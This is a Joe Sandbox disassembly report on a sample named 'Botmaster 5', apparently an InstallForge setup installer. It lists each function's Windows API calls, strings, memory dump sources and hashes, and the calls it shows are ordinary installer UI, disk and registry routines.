                                                                                                                                                                                                                    • Part of subcall function 00424615: GetSystemMetrics.USER32(0000000F), ref: 00424657
                                                                                                                                                                                                                    • Part of subcall function 00421743: memset.MSVCRT ref: 00421775
                                                                                                                                                                                                                    • Part of subcall function 00421743: LoadLibraryW.KERNELBASE(RICHED20.DLL), ref: 00421810
                                                                                                                                                                                                                    • Part of subcall function 00421743: LoadLibraryW.KERNEL32(RICHED32.DLL), ref: 00421820
                                                                                                                                                                                                                    • Part of subcall function 00421743: GetProcAddress.KERNEL32(745C0000,OpenThemeData), ref: 00421837
                                                                                                                                                                                                                    • Part of subcall function 00421743: GetProcAddress.KERNEL32(CloseThemeData), ref: 00421849
                                                                                                                                                                                                                    • Part of subcall function 00421743: GetProcAddress.KERNEL32(GetThemeBackgroundContentRect), ref: 0042185B
                                                                                                                                                                                                                    • Part of subcall function 00421743: GetProcAddress.KERNEL32(IsThemeBackgroundPartiallyTransparent), ref: 0042186D
                                                                                                                                                                                                                    • Part of subcall function 00421743: GetProcAddress.KERNEL32(DrawThemeParentBackground), ref: 0042187F
                                                                                                                                                                                                                    • Part of subcall function 00421743: GetProcAddress.KERNEL32(DrawThemeBackground), ref: 00421891
                                                                                                                                                                                                                    • Part of subcall function 00421743: CreateWindowExW.USER32(-000001FF,RichEdit20W,00000000,?,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 004218EB
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000014,00000448,00000000), ref: 00407682
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000014,0000043B,00000000), ref: 004076A1
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000014,00000445,00000000), ref: 004076C4
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000014,0000045B,00000001), ref: 004076E3
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 0041C085: wcsncpy.MSVCRT ref: 0041C0B7
                                                                                                                                                                                                                    • Part of subcall function 0041C085: wcslen.MSVCRT ref: 0041C0C8
                                                                                                                                                                                                                    • Part of subcall function 0041C085: wcscat.MSVCRT ref: 0041C0FC
                                                                                                                                                                                                                    • Part of subcall function 0041C085: GetDriveTypeW.KERNELBASE(?,?,?,?,00000000), ref: 0041C10A
                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32(00000400,00000400), ref: 00407A27
                                                                                                                                                                                                                    • Part of subcall function 00420FD6: SendMessageA.USER32(00000000,00000030,000000FF,00000001), ref: 00421026
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                    • Part of subcall function 00406502: SetErrorMode.KERNEL32(00000001), ref: 00406531
                                                                                                                                                                                                                    • Part of subcall function 00406502: GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000003,00000000,00000001,00000000,00000003,00000000,00000000,00000001), ref: 00406569
                                                                                                                                                                                                                    • Part of subcall function 00406502: SetErrorMode.KERNEL32(00000000,00000000,00000000,00000003,00000000,00000001,00000000,00000003,00000000,00000000,00000001), ref: 0040659F
                                                                                                                                                                                                                    • Part of subcall function 00420C8D: ShowWindow.USER32(00000000,00000005,00000000,004042F3,00000003,00000001,00000000,00000001,00000000,0000003D,00000001,00000001,00000001,00000001,00000000,00000001), ref: 00420CC2
                                                                                                                                                                                                                    • Part of subcall function 00420BAE: KiUserCallbackDispatcher.NTDLL(00000000,00000001), ref: 00420BD0
                                                                                                                                                                                                                    • Part of subcall function 0041C903: GetVersionExA.KERNEL32(?,-FFFFFEC7,?,-000000C9), ref: 0041C925
                                                                                                                                                                                                                    • Part of subcall function 0041C903: GetVersionExA.KERNEL32(?,?,-000000C9), ref: 0041C953
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AddressProc$MessageSend$ClientErrorHeapLibraryLoadModeRectUserVersionWindowwcslen$AllocAllocateCallbackCreateDiskDispatcherDriveFreeMenuMetricsNameShowSpaceSystemTypememsetwcscatwcsncpy
                                                                                                                                                                                                                  • String ID: $<appname>$<appversion>$licence.rtf
                                                                                                                                                                                                                  • API String ID: 2663491473-761403372
                                                                                                                                                                                                                  • Opcode ID: 34133763fd3acde85fe390fdfa799585bec1b543e6980a625c3b91287cd537cc
                                                                                                                                                                                                                  • Instruction ID: 052852ef4dca4c1078e33f7aeb1041bb2f413f3870aebd12a444a7165807f6f0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34133763fd3acde85fe390fdfa799585bec1b543e6980a625c3b91287cd537cc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2927D713C43167AF63077A2AD53FAA26599B04F49F80403AB344BD1E3DEED5880966F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425D57 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(msimg32.dll), ref: 00425D66
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AlphaBlend), ref: 00425D7D
                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00425DA3
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProcVersion
                                                                                                                                                                                                                  • String ID: AlphaBlend$msimg32.dll
                                                                                                                                                                                                                  • API String ID: 2685220120-3639726679
                                                                                                                                                                                                                  • Opcode ID: 6656e59b38aa36cb447c0e95f0980ee2285dd7d5455a10968b8f40ee1dcedbae
                                                                                                                                                                                                                  • Instruction ID: 8856fbd6a47b88bb19884d1e5185d7777af6d37f709e4e710b29dd2c849fdf39
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6656e59b38aa36cb447c0e95f0980ee2285dd7d5455a10968b8f40ee1dcedbae
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42015EB0A517299BCB219B15AD0D2D677B8FB50756F5082B7C180D5210F3F848C0CF6E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004247C0 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000004), ref: 004247E1
                                                                                                                                                                                                                  • SetActiveWindow.USER32(00000000,?,00404770,00000000,00000001,00000001,00000000,0000003D,00000001,00000001,00000001,00000001,00000000,00000001,00000001,00000000), ref: 004247F2
                                                                                                                                                                                                                  • IsZoomed.USER32(00000000), ref: 004247FE
                                                                                                                                                                                                                  • IsIconic.USER32(00000000), ref: 0042480F
                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000001,?,00404770,00000000,00000001,00000001,00000000,0000003D,00000001,00000001,00000001,00000001,00000000,00000001,00000001), ref: 00424822
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$ActiveIconicShowZoomed
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 869202870-0
                                                                                                                                                                                                                  • Opcode ID: d2c29f3b0c30027ff3c377b830fe1097b04098fb45541d09477b1d28a5072b5a
                                                                                                                                                                                                                  • Instruction ID: 432fc2528d327898e18a11e5434a254d2abb36d4ee352001c379221f8793a9d4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2c29f3b0c30027ff3c377b830fe1097b04098fb45541d09477b1d28a5072b5a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F03134604252EFEB216F21FC18B167AE8FB84751F52443AF581901A4DBF58C50DA5D
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00406502 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00406531
                                                                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000003,00000000,00000001,00000000,00000003,00000000,00000000,00000001), ref: 00406569
                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000003,00000000,00000001,00000000,00000003,00000000,00000000,00000001), ref: 0040659F
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                  • API String ID: 1682464887-2861137601
                                                                                                                                                                                                                  • Opcode ID: 79696f25e9f509ce6ebaf275fc6f8f5a4f57c3af7e59e4ab2e66360f46cbd9c1
                                                                                                                                                                                                                  • Instruction ID: 87bc0a6974ab8788bebee1ffd914571b807bdfd12f43c4b0a24768797953235d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79696f25e9f509ce6ebaf275fc6f8f5a4f57c3af7e59e4ab2e66360f46cbd9c1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33414DB1208301AFD300EF51EC81A2FB7F9FB84318F54883EF185AA251D7799D658B5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004049E7 Relevance: 3.0, APIs: 2, Instructions: 19comCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 004049F0
                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0043A858,00000000,00000001,0043A868,00000000,00000000,0045DF26,00408A9C,00000035,00000001,0000003B,00000000,00000007,0000003B,00000002,00000000), ref: 00404A0F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateInitializeInstance
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3519745914-0
                                                                                                                                                                                                                  • Opcode ID: db0be8653e99ee2d14ada892040a6b67eb3287710424c46c615e6e7223992d42
                                                                                                                                                                                                                  • Instruction ID: 4170ed63a7f04d0d6b04d7f9422dc676b476f32d5ee4902fa325786225818b3f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db0be8653e99ee2d14ada892040a6b67eb3287710424c46c615e6e7223992d42
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3ED0A7712C830C2AF190B1216C42F37328CC708304F005837FF9CD9181E38D681D452B
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00401000 Relevance: 223.9, APIs: 10, Strings: 116, Instructions: 3372memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040100F
                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                    • Part of subcall function 004298D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040104E,00000000,00001000,00000000,00000000), ref: 004298DC
                                                                                                                                                                                                                    • Part of subcall function 004298D0: HeapAlloc.KERNEL32(00990000,00000000,00004208,?,0040104E,00000000,00001000,00000000,00000000), ref: 0042990A
                                                                                                                                                                                                                    • Part of subcall function 0042759B: TlsAlloc.KERNEL32(0040105D,00000000,00001000,00000000,00000000), ref: 0042759B
                                                                                                                                                                                                                    • Part of subcall function 00425D57: LoadLibraryW.KERNELBASE(msimg32.dll), ref: 00425D66
                                                                                                                                                                                                                    • Part of subcall function 00425D57: GetProcAddress.KERNEL32(00000000,AlphaBlend), ref: 00425D7D
                                                                                                                                                                                                                    • Part of subcall function 00425D57: GetVersionExW.KERNEL32(?), ref: 00425DA3
                                                                                                                                                                                                                    • Part of subcall function 00424279: LoadIconW.USER32(00000001,00000048), ref: 004242A7
                                                                                                                                                                                                                    • Part of subcall function 00424279: LoadCursorW.USER32(00000000,00007F00), ref: 004242B9
                                                                                                                                                                                                                    • Part of subcall function 0041FC82: InitializeCriticalSection.KERNEL32(0046C2B8,?,?,?,0040107B,00000000,00001000,00000000,00000000), ref: 0041FC8C
                                                                                                                                                                                                                    • Part of subcall function 0041FC82: GetStockObject.GDI32(00000011), ref: 0041FC94
                                                                                                                                                                                                                    • Part of subcall function 0041FC82: memset.MSVCRT ref: 0041FCD0
                                                                                                                                                                                                                    • Part of subcall function 0041FC82: InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 0041FCEA
                                                                                                                                                                                                                    • Part of subcall function 0041C580: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401085,00000000,00001000,00000000,00000000), ref: 0041C589
                                                                                                                                                                                                                    • Part of subcall function 0040FC47: memset.MSVCRT ref: 0040FC52
                                                                                                                                                                                                                    • Part of subcall function 0040F481: InitializeCriticalSection.KERNEL32(0046C260,00000004,00000004,0040F454,00000010,00000000,00000000,004010A3,00000000,00001000,00000000,00000000), ref: 0040F4A9
                                                                                                                                                                                                                    • Part of subcall function 0040F109: memset.MSVCRT ref: 0040F116
                                                                                                                                                                                                                    • Part of subcall function 0040F109: InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 0040F130
                                                                                                                                                                                                                    • Part of subcall function 0040F109: CoInitialize.OLE32(00000000), ref: 0040F138
                                                                                                                                                                                                                    • Part of subcall function 0040E17F: InitializeCriticalSection.KERNEL32(0046BF18,004010AD,00000000,00001000,00000000,00000000), ref: 0040E184
                                                                                                                                                                                                                    • Part of subcall function 00427B1D: HeapFree.KERNEL32(00000000,?,?,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000,00000000,00000000), ref: 00427B5B
                                                                                                                                                                                                                    • Part of subcall function 00427B1D: HeapFree.KERNEL32(00000000,?,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000,00000000,00000000), ref: 00427B73
                                                                                                                                                                                                                    • Part of subcall function 00427B1D: HeapFree.KERNEL32(00000000,00001000,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000,00000000,00000000), ref: 00427B7D
                                                                                                                                                                                                                    • Part of subcall function 00427A6C: RtlAllocateHeap.NTDLL(00000000,00000034,?,?,?,0041CA17,00000074,00000000,00000000,00000007,00401080,00000000,00001000,00000000,00000000), ref: 00427A7F
                                                                                                                                                                                                                    • Part of subcall function 00427A6C: HeapAlloc.KERNEL32(00401080,00000008,?,?,?,0041CA17,00000074,00000000,00000000,00000007,00401080,00000000,00001000,00000000,00000000), ref: 00427A94
                                                                                                                                                                                                                    • Part of subcall function 004048D2: CreateMutexW.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 004048F0
                                                                                                                                                                                                                    • Part of subcall function 004048D2: GetLastError.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 004048FA
                                                                                                                                                                                                                    • Part of subcall function 004048D2: ReleaseMutex.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 0040492A
                                                                                                                                                                                                                    • Part of subcall function 004048D2: CloseHandle.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 00404935
                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000,00000000,00000000,00000004,00000006), ref: 00404823
                                                                                                                                                                                                                  • HeapDestroy.KERNEL32(00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000,00000000,00000000,00000004,00000006), ref: 00404833
                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000,00000000,00000000,00000004,00000006), ref: 00404838
                                                                                                                                                                                                                    • Part of subcall function 0040F140: MessageBoxW.USER32(00000000,00000007,00001000,00000000), ref: 0040F15A
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$CreateInitializememset$AllocCriticalFreeLoadSection$CommonControlsExitHandleInitMutexProcess$AddressAllocateCloseCursorDestroyErrorIconLastLibraryMessageModuleObjectProcReleaseStockVersion
                                                                                                                                                                                                                  • String ID: ^)$.ifl$<appname>$<appversion>$AcceptOptn$Addition$AdditionalTasks$Allow_Desktopicons$Allow_StartMenuFolder$ApplicationFolder$Appname$BM~g$BackBtn$BrowseBtn$CancelBtn$ChangeApplicationFolder$ChangeStartMenuFolder$Commands.dat$Company$CouldNotExtractFile$CouldNotExtractFileH$CreateDesktopIconCbx$CreateStartMenuFolderCbx$DFA$Default.ifl$Desktopicon$DestinationFolderFR3$Dll$DoNotAcceptOptn$Error$ExitSetup$ExitSetupH$Finish$FinishBtn$Gadgets$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HeadB$HeadT$Image_Left.jpg$Image_Top.jpg$InstallDir$InstallForge$InstallForge Setup$Installing$Languages$LaunchProgramCbx$Licence$LicenceAgreement$Main$Messages$Microsoft Sans Serif$NextBtn$NoOSCheck$OS.dat$ProgramFiles$ProgramRun$ProgramRunArguments$RebootCbx$Registry$SC.dat$SFA$SPS_Time$SelAppFolder$SelStartMenuFolder$SerialCheck$Serialcheck$Serials$Serials.dat$Setup$Setup Error!$Setup Error! -f$Setup.cab$Shell execute$ShortcutFolder$SplashScreen$Start$StartMenuFolder$Text$Text1$Text2$Text3$Text4$There is already an InstallForge setup running! Please close the running setup in order to continue.$Title$TotalSize$Uninstaller$UninstallerFilename$Uninstaller_VW$Url$UrlFileName$Variables.dat$Verdana$Version$Website$Website1$Windows 10$Windows 2000$Windows 7$Windows 8$Windows Server 2003$Windows Server 2008$Windows Server 2016$Windows Vista$Windows XP$Your operating system is not supported.$\Shell32.dll$dll.dll$icon.dat$isps.dat$label$languages.dat$licence.rtf$ssps.dat
                                                                                                                                                                                                                  • API String ID: 3356826795-2233399581
                                                                                                                                                                                                                  • Opcode ID: 5087dd5819aa3a5a96ed5b0ef5f09bd72f1f14c180d018dd38488f87de94e6d9
                                                                                                                                                                                                                  • Instruction ID: 2c60e97324895152ddd5225313fbd1138f62d8ea17331308dc46dd8347ff369b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5087dd5819aa3a5a96ed5b0ef5f09bd72f1f14c180d018dd38488f87de94e6d9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C4336B1340211BAD7117B51EC53F6A3668EB48718F50802BF650A92E2E7FD5CD09BAF
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040F5A1 Relevance: 72.1, APIs: 40, Strings: 1, Instructions: 365memorypipesynchronizationCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
